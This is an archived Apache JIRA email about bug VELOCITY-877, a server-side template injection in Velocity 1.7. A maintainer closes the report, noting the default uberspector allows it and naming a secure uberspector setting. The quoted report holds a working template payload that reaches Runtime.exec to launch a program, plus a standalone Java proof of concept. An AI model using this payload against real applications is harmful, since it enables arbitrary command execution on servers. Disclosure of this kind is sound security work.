You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@velocity.apache.org by "Sergiu Dumitriu (JIRA)" <ji...@apache.org> on 2016/08/15 15:39:20 UTC
[jira] [Closed] (VELOCITY-877) Access to critical fields/methods
allows execution of arbitrary code ('Template Injection')
[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sergiu Dumitriu closed VELOCITY-877.
------------------------------------
Resolution: Not A Problem
Assignee: Sergiu Dumitriu
Yes, this is by design, **if** you are using the default uberspector. Velocity also comes with a secure uberspector, which is designed to prevent exactly this kind of security issues.
{noformat}
runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector
{noformat}
> Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
> -------------------------------------------------------------------------------------------
>
> Key: VELOCITY-877
> URL: https://issues.apache.org/jira/browse/VELOCITY-877
> Project: Velocity
> Issue Type: Bug
> Components: Engine
> Affects Versions: 1.7
> Reporter: Markus Wulftange
> Assignee: Sergiu Dumitriu
> Priority: Critical
> Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
> public class VelocityTest {
> public static void main(String[] args) {
> Context context = new VelocityContext();
> context.put("var", "foo");
> String instring = "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
> Velocity.evaluate(context, null, "templateName", instring);
> }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@velocity.apache.org
For additional commands, e-mail: dev-help@velocity.apache.org